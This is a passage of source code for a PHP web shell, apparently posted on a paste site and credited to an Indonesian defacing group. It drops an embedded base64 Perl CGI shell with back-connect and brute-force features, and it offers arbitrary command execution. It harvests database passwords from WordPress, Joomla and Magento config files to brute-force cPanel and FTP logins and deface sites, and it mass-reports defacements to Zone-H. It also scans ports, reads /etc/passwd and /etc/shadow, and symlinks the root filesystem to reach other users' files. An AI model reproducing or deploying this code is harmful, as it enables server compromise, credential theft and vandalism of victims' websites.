zaWYoJEFjdGlvbiBlcSAidXBsb2FkIikgCQkJCQkjIHVzZXIgd2FudHMgdG8gdXBsb2FkIGEgZmlsZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoKCXByaW50ICZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImJhY2tiaW5kIikgCQkJCSMgdXNlciB3YW50cyB0byBiYWNrIGNvbm5lY3Qgb3IgYmluZCBwb3J0CnsKCSZQcmludFBhZ2VIZWFkZXIoImNsaWVudHBvcnQiKTsKCXByaW50ICZCYWNrQmluZDsKfQplbHNpZigkQWN0aW9uIGVxICJicnV0ZWZvcmNlciIpIAkJCSMgdXNlciB3YW50cyB0byBicnV0ZSBmb3JjZQp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJkJydXRlRm9yY2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAiZG93bmxvYWQiKSAJCQkJIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CglwcmludCAmRG93bmxvYWRGaWxlOwp9ZWxzaWYoJEFjdGlvbiBlcSAiY2hlY2tsb2ciKSAJCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbG9nIGZpbGUKewoJJlByaW50UGFnZUhlYWRlcjsKCXByaW50ICZWaWV3TG9nOwoKfWVsc2lmKCRBY3Rpb24gZXEgImRvbWFpbnN1c2VyIikgCQkJIyB1c2VyIHdhbnRzIHRvIHZpZXcgbGlzdCB1c2VyL2RvbWFpbgp7CgkmUHJpbnRQYWdlSGVhZGVyOwoJcHJpbnQgJlZpZXdEb21haW5Vc2VyOwp9ZWxzaWYoJEFjdGlvbiBlcSAibG9nb3V0IikgCQkJCSMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0KJlByaW50UGFnZUZvb3Rlcjs=';
  1475.  
  1476. $file = fopen("cgi2012.izo" ,"w+");
  1477. $write = fwrite ($file ,base64_decode($cgi2012));
  1478. fclose($file);
  1479.     chmod("cgi2012.izo",0755);
  1480.    echo " <iframe src=cgi2012/cgi2012.izo width=96% height=76% frameborder=0></iframe>
  1481.  
  1482.  </div>"; }
  1483. elseif($_GET['666'] == '64base') {
  1484.    
  1485. echo '<div style="text-align:left" class="mybox"><h1>Base64 Encode/Decoder</h1>
  1486. <form action="" method=POST>
  1487. Encode :<input type=text name=code style="border:0;border-bottom:1px solid #292929; width:500px;"><br><br>
  1488. <input type=submit style="width: 50px; height: 30px; border-color=white;" name=codificar class="kotak" value=Encode>
  1489. </form><hr color="white"><br>
  1490. <form action="" method=POST>
  1491. Decode :<input type=text name=decode style="border:0;border-bottom:1px solid #292929; width:500px;"><br><br>
  1492. <input type=submit style="width: 50px; height: 30px; border-color=white;" name=decodificar class="kotak" value=Decode>
  1493. </form></div>
  1494. ';
  1495.    
  1496.     if (isset($_POST['codificar'])) {
  1497.         echo "<div class='mybox'><center>";
  1498.         echo "Text<br><br><fieldset style='border-color:white'>" . $_POST['code'] . "</fieldset><br><br>Result<br><br><fieldset style='border-color:white'>";
  1499.         echo base64_encode($_POST['code']);
  1500.         echo "</fieldset></center></div>";
  1501.     }
  1502.     if (isset($_POST['decodificar'])) {
  1503.         echo "<div class='mybox'><center><br><br>Text<br><br><fieldset style='border-color:white'>" . $_POST['decode'] . "</fieldset><br><br>Result<br><br><fieldset style='border-color:white'>";
  1504.         echo base64_decode($_POST['decode']);
  1505.         echo "</fieldset></Center></div>";
  1506.   }  
  1507. }
  1508. elseif($_GET['666'] == 'string'){
  1509. $text = $_POST['code'];
  1510. ?><center class='mybox'><h1>String Encode & Decode</h1>
  1511. <form method="post"><br>
  1512. <textarea class='mybox' cols=80 rows=10 name="code"></textarea><br><br>
  1513. <select size="1" name="ope">
  1514. <option value="urlencode" style='background:transparent;color:aqua;'>url</option>
  1515. <option value="base64" style='background:transparent;color:aqua;'>Base64</option>
  1516. <option value="ur" style='background:transparent;color:aqua;'>convert_uu</option>
  1517. <option value="json" style='background:transparent;color:aqua;'>json</option>
  1518. <option value="gzinflates" style='background:transparent;color:aqua;'>gzinflate - base64</option>
  1519. <option value="str2" style='background:transparent;color:aqua;'>str_rot13 - base64</option>
  1520. <option value="gzinflate" style='background:transparent;color:aqua;'>str_rot13 - gzinflate - base64</option>
  1521. <option value="gzinflater" style='background:transparent;color:aqua;'>gzinflate - str_rot13 - base64</option>
  1522. <option value="gzinflatex" style='background:transparent;color:aqua;'>gzinflate - str_rot13 - gzinflate - base64</option>
  1523. <option value="gzinflatew" style='background:transparent;color:aqua;'>str_rot13 - convert_uu - url - gzinflate - str_rot13 - base64 - convert_uu - gzinflate - url - str_rot13 - gzinflate - base64</option>
  1524. <option value="str" style='background:transparent;color:aqua;'>str_rot13 - gzinflate - str_rot13 - base64</option>
  1525. <option value="url" style='background:transparent;color:aqua;'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  1526. <option value="hexencode" style='background:transparent;color:aqua;'>Hex Encode/Decode</option>
  1527. <option value="md5" style='background:transparent;color:aqua;'><center>MD5 Hash</option>
  1528. <option value="sha1" style='background:transparent;color:aqua;'>SHA1 Hash</option>
  1529. <option value="str_rot13" style='background:transparent;color:aqua;'>ROT13 Hash</option>
  1530. <option value="strlen" style='background:transparent;color:aqua;'>strlen</option>
  1531. <option value="xxx" style='background:transparent;color:aqua;'>unescape</option>
  1532. <option value="bbb" style='background:transparent;color:aqua;'>charAt</option>
  1533. <option value="aaa" style='background:transparent;color:aqua;'>chr - bin2hex - substr</option>
  1534. <option value="www" style='background:transparent;color:aqua;'>chr</option>
  1535. <option value="sss" style='background:transparent;color:aqua;'>htmlspecialchars</option>
  1536. <option value="eee" style='background:transparent;color:aqua;'>escape</option></select>&nbsp;
  1537. <input class='kotak' type='submit' name='submit' value='Encrypt'>
  1538. <input class='kotak' type='submit' name='crack' value='Decrypt'>
  1539. </form>
  1540.  
  1541. <?php
  1542. $submit = $_POST['submit'];
  1543. if (isset($submit)){
  1544. $op = $_POST["ope"];
  1545. switch ($op) {case 'base64': $codi=base64_encode($text);
  1546. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  1547. break;case 'json' : $codi=json_encode(utf8_encode($text));
  1548. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  1549. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  1550. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  1551. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
  1552. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
  1553. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  1554. break;case 'urlencode' : $codi=rawurlencode($text);
  1555. break;case 'hexencode' : $codi=bin2hex($text);
  1556. break;case 'md5' : $codi=md5($text);
  1557. break;case 'ur' : $codi=convert_uuencode($text);
  1558. break;case 'str_rot13' : $codi=str_rot13($text);
  1559. break;case 'sha1' : $codi=sha1($text);
  1560. break;case 'strlen' : $codi=strlen($text);
  1561. break;case 'xxx' : $codi=strlen(bin2hex($text));
  1562. break;case 'bbb' : $codi=htmlentities(utf8_decode($text));
  1563. break;case 'aaa' : $codi=chr(bin2hex(substr($text)));
  1564. break;case 'www' : $codi=chr($text);
  1565. break;case 'sss' : $codi=htmlspecialchars($text);
  1566. break;case 'eee' : $codi=addslashes($text);
  1567. break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
  1568. break;default:break;}}
  1569.  
  1570. $submit = $_POST['crack'];
  1571. if (isset($submit)){
  1572. $op = $_POST["ope"];
  1573. switch ($op) {case 'base64': $codi=base64_decode($text);
  1574. break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  1575. break;case 'json' : $codi=utf8_dencode(json_dencode($text));
  1576. break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
  1577. break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
  1578. break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
  1579. break;case 'gzinflatew' : $codi=str_rot13(rawurldecode(convert_uudecode(gzinflate(str_rot13(base64_decode(convert_uudecode(gzinflate(rawurldecode(str_rot13(gzinflate(base64_decode($text))))))))))));
  1580. break;case 'gzinflates' : $codi=gzinflate(base64_decode($text));
  1581. break;case 'str2' : $codi=str_rot13(base64_decode($text));
  1582. break;case 'urlencode' : $codi=rawurldecode($text);
  1583. break;case 'hexencode' : $codi=quoted_printable_decode($text);
  1584. break;case 'ur' : $codi=convert_uudecode($text);
  1585. break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
  1586. break;default:break;}}
  1587.  
  1588. echo '<textarea cols=80 rows=10 class="mybox" readonly>'.$codi.'</textarea></center><BR><BR>';
  1589.  
  1590. }
  1591.  
  1592.  elseif($_GET['666'] == 'cmd') {
  1593.     echo "<div class='mybox'>
  1594.     <form method='post'>
  1595.     <font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
  1596.     <input type='text' size='30' height='10' style='border:0; border-bottom: 1px solid #191919' name='cmd'><input type='submit'  style='border-color=white'name='do_cmd' class='kotak' value='>>'>
  1597.     </form></div>";
  1598.     if($_POST['do_cmd']) {
  1599.         echo "<pre>".exe($_POST['cmd'])."</pre><br>";
  1600.         echo "<hr color='white'>";
  1601.        
  1602.     }
  1603. }
  1604. elseif($_GET['666'] == 'cpdepes') {
  1605.     if($_POST['crack']) {
  1606.         $usercp = explode("\r\n", $_POST['user_cp']);
  1607.         $passcp = explode("\r\n", $_POST['pass_cp']);
  1608.         $i = 0;
  1609.         foreach($usercp as $ucp) {
  1610.             foreach($passcp as $pcp) {
  1611.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  1612.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  1613.                     } else {
  1614.                         $_SESSION[$ucp] = "1";
  1615.                         $_SESSION[$pcp] = "1";
  1616.                         if($ucp == '' || $pcp == '') {
  1617.                             //
  1618.                         } else {
  1619.                             echo "[+] username (<font color=red>$ucp</font>) password (<font color=red>$pcp</font>)<br>";
  1620.                             $ftp_conn = ftp_connect($ip);
  1621.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  1622.                             if((!$ftp_login) || (!$ftp_conn)) {
  1623.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  1624.                             } else {
  1625.                                 echo "[+] <font color=red>Login Sukses</font><br>";
  1626.                                 $fi = htmlspecialchars($_POST['file_deface']);
  1627.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  1628.                                 if($deface) {
  1629.                                     $i++;
  1630.                                     echo "[+] <font color=red>Deface Sukses</font><br>";
  1631.                                     if(function_exists('posix_getpwuid')) {
  1632.                                         $domain_cp = file_get_contents("/etc/named.conf");
  1633.                                         if($domain_cp == '') {
  1634.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1635.                                         } else {
  1636.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  1637.                                             foreach($domains_cp[1] as $dj) {
  1638.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1639.                                                 $user_cp_url = $user_cp_url['name'];
  1640.                                                 if($user_cp_url == $ucp) {
  1641.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  1642.                                                     break;
  1643.                                                 }
  1644.                                             }
  1645.                                         }
  1646.                                     } else {
  1647.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  1648.                                     }
  1649.                                 } else {
  1650.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  1651.                                 }
  1652.                             }
  1653.                             //echo "username (<font color=red>$ucp</font>) password (<font color=red>$pcp</font>)<br>";
  1654.                         }
  1655.                     }
  1656.                 }
  1657.             }
  1658.         }
  1659.         if($i == 0) {
  1660.         } else {
  1661.             echo "<br>sukses deface ".$i." Cpanel by <font color=red>./Mr.HTTP Private Shell</font>";
  1662.         }
  1663.     } else {
  1664.         echo "<center class='mybox'><h1>Cpanel Auto Deface</h1><hr color='white'>
  1665.         <form method='post'>
  1666.         Filename: <br>
  1667.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  1668.         Deface Page: <br>
  1669.         <input type='text' name='deface' placeholder='http://127.0.0.1/filemu.php' style='width: 450px;'><br>
  1670.         USER: <br>
  1671.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  1672.         $_usercp = fopen("/etc/passwd","r");
  1673.         while($getu = fgets($_usercp)) {
  1674.             if($getu == '' || !$_usercp) {
  1675.                 echo "<font color=red>Can't read /etc/passwd</font>";
  1676.             } else {
  1677.                 preg_match_all("/(.*?):x:/", $getu, $u);
  1678.                 foreach($u[1] as $user_cp) {
  1679.                         if(is_dir("/home/$user_cp/public_html")) {
  1680.                             echo "$user_cp\n";
  1681.                     }
  1682.                 }
  1683.             }
  1684.         }
  1685.         echo "</textarea><br>
  1686.         PASS: <br>
  1687.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  1688.         function cp_pass($dir) {
  1689.             $pass = "";
  1690.             $dira = scandir($dir);
  1691.             foreach($dira as $dirb) {
  1692.                 if(!is_file("$dir/$dirb")) continue;
  1693.                 $ambil = file_get_contents("$dir/$dirb");
  1694.                 if(preg_match("/WordPress/", $ambil)) {
  1695.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  1696.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  1697.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  1698.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  1699.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  1700.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  1701.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  1702.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  1703.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  1704.                 } elseif(preg_match("/client/", $ambil)) {
  1705.                     preg_match("/password=(.*)/", $ambil, $pass1);
  1706.                     if(preg_match('/"/', $pass1[1])) {
  1707.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  1708.                         $pass .= $pass1[1]."\n";
  1709.                     }
  1710.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  1711.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  1712.                 }
  1713.             }
  1714.             echo $pass;
  1715.         }
  1716.         $cp_pass = cp_pass($dir);
  1717.         echo $cp_pass;
  1718.         echo "</textarea><br>
  1719.         <input type='submit' name='crack' style='width: 450px;' value='SIKAT!'>
  1720.         </form>
  1721.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  1722.     }
  1723. }
  1724. elseif($_GET['666'] == 'port') {
  1725.     echo '<div style="text-align:left" class="mybox"><table><tr><h1>Port Scanner</h1><td>';
  1726.     echo '<div class="content">';
  1727.     echo '<form action="" method="post">';
  1728.    
  1729.     if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
  1730.         $start = strip_tags($_POST['start']);
  1731.         $end = strip_tags($_POST['end']);
  1732.         $host = strip_tags($_POST['host']);
  1733.         for($i = $start; $i<=$end; $i++){
  1734.             $fp = @fsockopen($host, $i, $errno, $errstr, 3);
  1735.             if($fp){
  1736.                 echo 'Port '.$i.' is <font color=green>open</font><br>';
  1737.             }
  1738.             flush();
  1739.         }
  1740.     } else {
  1741.         echo '<input type="hidden" name="a" value="PortScanner"><input type="hidden" name=p1><input type="hidden" name="p2">
  1742.               <input type="hidden" name="c" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  1743.               <input type="hidden" name="charset" value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  1744.               Host: &nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp<input type="text" style="border:0;border-bottom:1px solid #292929; width:500px;" name="host" value="localhost"/><br /><br />
  1745.               Port Start: &nbsp<input type="text" style="border:0;border-bottom:1px solid #292929; width:500px;" name="start" value="0"/><br /><br />
  1746.               Port End:&nbsp&nbsp&nbsp&nbsp<input type="text" style="border:0;border-bottom:1px solid #292929; width:500px;" name="end" value="5000"/><br /><br />
  1747.               <input type="submit" style="width: 100px; height: 30px; border-color=white;margin:10px 2px 0 2px;" value="Scan Ports !" />
  1748.               </form>';
  1749.     echo '</div></table></td></div>';
  1750.     }
  1751. }
  1752. elseif($_GET['666'] == 'zip') {
  1753.     echo "<div class='mybox'>";
  1754.     echo "<h1>Zip Menu</h1><hr color='white'>";
  1755. function rmdir_recursive($dir) {
  1756.     foreach(scandir($dir) as $file) {
  1757.        if ('.' === $file || '..' === $file) continue;
  1758.        if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  1759.        else unlink("$dir/$file");
  1760.    }
  1761.    rmdir($dir);
  1762. }
  1763. if($_FILES["zip_file"]["name"]) {
  1764.     $filename = $_FILES["zip_file"]["name"];
  1765.     $source = $_FILES["zip_file"]["tmp_name"];
  1766.     $type = $_FILES["zip_file"]["type"];
  1767.     $name = explode(".", $filename);
  1768.     $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  1769.     foreach($accepted_types as $mime_type) {
  1770.         if($mime_type == $type) {
  1771.             $okay = true;
  1772.             break;
  1773.         }
  1774.     }
  1775.     $continue = strtolower($name[1]) == 'zip' ? true : false;
  1776.     if(!$continue) {
  1777.         $message = "Itu Bukan Zip  , , GOBLOK COK";
  1778.     }
  1779.   $path = dirname(__FILE__).'/';
  1780.   $filenoext = basename ($filename, '.zip');
  1781.   $filenoext = basename ($filenoext, '.ZIP');
  1782.   $targetdir = $path . $filenoext;
  1783.   $targetzip = $path . $filename;
  1784.   if (is_dir($targetdir))  rmdir_recursive ( $targetdir);
  1785.   mkdir($targetdir, 0777);
  1786.     if(move_uploaded_file($source, $targetzip)) {
  1787.         $zip = new ZipArchive();
  1788.         $x = $zip->open($targetzip);
  1789.         if ($x === true) {
  1790.             $zip->extractTo($targetdir);
  1791.             $zip->close();
  1792.  
  1793.             unlink($targetzip);
  1794.         }
  1795.         $message = "<b>Sukses Cok :)</b>";
  1796.     } else {    
  1797.         $message = "<b>Error Jancok :(</b>";
  1798.     }
  1799. }  
  1800. echo '<table style="width:100%" border="1">
  1801. <div class="mybox"><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  1802. <label>Zip File : <input type="file" name="zip_file" /></label>
  1803. <input type="submit" class="kotak" name="submit" value="Upload And Unzip" />
  1804. </form><br><br></div>';
  1805. if($message) echo "<p>$message</p>";
  1806. echo "<div class='mybox'><h2>Zip Backup</h2>
  1807. <form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br>
  1808. <input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><br>
  1809. <font style='text-decoration: underline;'>Save To:</font><br>
  1810. <input type='text' name='save' value='$dir/owlsquad_backup.zip' style='width: 450px;' height='10'><br><br>
  1811. <input type='submit' name='backup' class='kotak' value='Back Up!' style='width: 215px;'></form><br><br></div>";
  1812.     if($_POST['backup']){
  1813.     $save=$_POST['save'];
  1814.     function Zip($source, $destination)
  1815. {
  1816.     if (extension_loaded('zip') === true)
  1817.     {
  1818.         if (file_exists($source) === true)
  1819.         {
  1820.             $zip = new ZipArchive();
  1821.  
  1822.             if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1823.             {
  1824.                 $source = realpath($source);
  1825.  
  1826.                 if (is_dir($source) === true)
  1827.                 {
  1828.                     $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1829.  
  1830.                     foreach ($files as $file)
  1831.                     {
  1832.                         $file = realpath($file);
  1833.  
  1834.                         if (is_dir($file) === true)
  1835.                         {
  1836.                             $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1837.                         }
  1838.  
  1839.                         else if (is_file($file) === true)
  1840.                         {
  1841.                             $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1842.                         }
  1843.                     }
  1844.                 }
  1845.  
  1846.                 else if (is_file($source) === true)
  1847.                 {
  1848.                     $zip->addFromString(basename($source), file_get_contents($source));
  1849.                 }
  1850.             }
  1851.  
  1852.             return $zip->close();
  1853.         }
  1854.     }
  1855.  
  1856.     return false;
  1857. }
  1858.     Zip($_POST['dir'],$save);
  1859.     echo "Selese , Save To <b>$save</b>";
  1860.     }
  1861.     echo "
  1862.     <div class='mybox'><h2>Unzip Manual</h2>
  1863.     <form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br>
  1864.     <input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><br>
  1865.     <font style='text-decoration: underline;'>Save To:</font><br>
  1866.     <input type='text' name='save' value='$dir/owlsquad_unzip' style='width: 450px;' height='10'><br><br>
  1867.     <input type='submit' name='extrak' class='kotak' value='Unzip!' style='width: 215px;'></form><br><br>
  1868.     </div>";
  1869.     if($_POST['extrak']){
  1870.     $save=$_POST['save'];
  1871.     $zip = new ZipArchive;
  1872.     $res = $zip->open($_POST['dir']);
  1873.     if ($res === TRUE) {
  1874.         $zip->extractTo($save);
  1875.         $zip->close();
  1876.     echo 'Succes , Location : <b>'.$save.'</b>';
  1877.     } else {
  1878.     echo 'Gagal Cok :( Ntahlah !';
  1879.     }
  1880.     }
  1881. echo '</table>';
  1882. echo "</div>";
  1883. ;}
  1884. elseif($_GET['666'] == 'metu') {
  1885.    
  1886.  
  1887. echo '<form action="?dir=$dir&do=metu" method="post">';
  1888.     unset($_SESSION[sha1($_SERVER['HTTP_HOST'])]);
  1889.     echo 'See ya! :P ';  
  1890. }
  1891. elseif($_GET['666'] == 'infosec') {
  1892. echo '<div class="mybox"><table><h1><u>Server security information</u></h1><td><div class=content>';
  1893.     function showSecParam($n, $v) {
  1894.         $v = trim($v);
  1895.         if($v) {
  1896.             echo '<span>'.$n.': </span>';
  1897.             if(strpos($v, "\n") === false)
  1898.                 echo $v.'<br>';
  1899.             else
  1900.                 echo '<pre class=ml1>'.$v.'</pre>';
  1901.         }
  1902.     }
  1903.    
  1904.     showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
  1905.     showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
  1906.     showSecParam('Open base dir', @ini_get('open_basedir'));
  1907.     showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
  1908.     showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
  1909.     showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
  1910.     $temp=array();
  1911.     if(function_exists('mysql_get_client_info'))
  1912.         $temp[] = "MySql (".mysql_get_client_info().")";
  1913.     if(function_exists('mssql_connect'))
  1914.         $temp[] = "MSSQL";
  1915.     if(function_exists('pg_connect'))
  1916.         $temp[] = "PostgreSQL";
  1917.     if(function_exists('oci_connect'))
  1918.         $temp[] = "Oracle";
  1919.     showSecParam('Supported databases', implode(', ', $temp));
  1920.     echo '<br>';
  1921.    
  1922.     if( $GLOBALS['os'] == 'nix' ) {
  1923.         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
  1924.         $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
  1925.         $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
  1926.         showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
  1927.         showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
  1928.         showSecParam('OS version', @file_get_contents('/proc/version'));
  1929.         showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
  1930.         if(!$GLOBALS['safe_mode']) {
  1931.             echo '<br>';
  1932.             $temp=array();
  1933.             foreach ($userful as $item)
  1934.                 if(which($item)){$temp[]=$item;}
  1935.             showSecParam('Userful', implode(', ',$temp));
  1936.             $temp=array();
  1937.             foreach ($danger as $item)
  1938.                 if(which($item)){$temp[]=$item;}
  1939.             showSecParam('Danger', implode(', ',$temp));
  1940.             $temp=array();
  1941.             foreach ($downloaders as $item)
  1942.                 if(which($item)){$temp[]=$item;}
  1943.             showSecParam('Downloaders', implode(', ',$temp));
  1944.             echo '<br/>';
  1945.             showSecParam('Hosts', @file_get_contents('/etc/hosts'));
  1946.             showSecParam('HDD space', ex('df -h'));
  1947.             showSecParam('Mount options', @file_get_contents('/etc/fstab'));
  1948.         }
  1949.     } else {
  1950.         showSecParam('OS Version',ex('ver'));
  1951.         showSecParam('Account Settings',ex('net accounts'));
  1952.         showSecParam('User Accounts',ex('net user'));
  1953.     }
  1954.     echo '</div></th></table>';
  1955.  
  1956.     echo '</div></th></table>';
  1957.     echo "</div>";
  1958. }
  1959. elseif($_GET['666'] == 'zoneh') {
  1960.     if($_POST['submit']) {
  1961.         $domain = explode("\r\n", $_POST['url']);
  1962.         $nick =  $_POST['nick'];
  1963.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1964.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1965.         function zoneh($url,$nick) {
  1966.             $ch = curl_init("http://www.zone-h.com/notify/single");
  1967.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1968.                   curl_setopt($ch, CURLOPT_POST, true);
  1969.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1970.             return curl_exec($ch);
  1971.                   curl_close($ch);
  1972.         }
  1973.         foreach($domain as $url) {
  1974.             $zoneh = zoneh($url,$nick);
  1975.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1976.                 echo "$url -> <font color=lime>OK</font><br>";
  1977.             } else {
  1978.                 echo "$url -> <font color=red>ERROR</font><br>";
  1979.             }
  1980.         }
  1981.     } else {
  1982.         echo "<center class='mybox'><form method='post'>
  1983.         <h1>Zone-H Mass Poster</h1><hr color='white'><br>
  1984.         <u>Defacer</u>: <br>
  1985.         <input type='text' style='border-color=white' name='nick' size='50' value='Berandal'><br>
  1986.         <u>Domains</u>: <br>
  1987.         <textarea style='width: 450px; height: 150px; border-color=white' name='url'></textarea><br>
  1988.         <input type='submit' class='kotak' name='submit' value='Submit' style='width: 450px; border-color=white'>
  1989.         </form>";
  1990.     }
  1991.     echo "</center>";
  1992. }
  1993. elseif($_GET['666'] == 'symlink') {
  1994. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1995. $d0mains = @file("/etc/named.conf");
  1996. ##httaces
  1997. if($d0mains){
  1998. @mkdir("os_sym",0777);
  1999. @chdir("os_sym");
  2000. @exe("ln -s / root");
  2001. $file3 = 'Options Indexes FollowSymLinks
  2002. DirectoryIndex Berandal.htm
  2003. AddType text/plain .php
  2004. AddHandler text/plain .php
  2005. Satisfy Any';
  2006. $fp3 = fopen('.htaccess','w');
  2007. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  2008. echo "
  2009. <table align=center border=1 style='width:60%;border-color:#333333;'>
  2010. <tr>
  2011. <td align=center><font size=2>S. No.</font></td>
  2012. <td align=center><font size=2>Domains</font></td>
  2013. <td align=center><font size=2>Users</font></td>
  2014. <td align=center><font size=2>Symlink</font></td>
  2015. </tr>";
  2016. $dcount = 1;
  2017. foreach($d0mains as $d0main){
  2018. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  2019. flush();
  2020. if(strlen(trim($domains[1][0])) > 2){
  2021. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  2022. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  2023. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  2024. <td>".$user['name']."</td>
  2025. <td><a href='$full/os_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  2026. flush();
  2027. $dcount++;}}}
  2028. echo "</table>";
  2029. }else{
  2030. $TEST=@file('/etc/passwd');
  2031. if ($TEST){
  2032. @mkdir("os_sym",0777);
  2033. @chdir("os_sym");
  2034. exe("ln -s / root");
  2035. $file3 = 'Options Indexes FollowSymLinks
  2036. DirectoryIndex Berandal.htm
  2037. AddType text/plain .php
  2038. AddHandler text/plain .php
  2039. Satisfy Any';
  2040.  $fp3 = fopen('.htaccess','w');
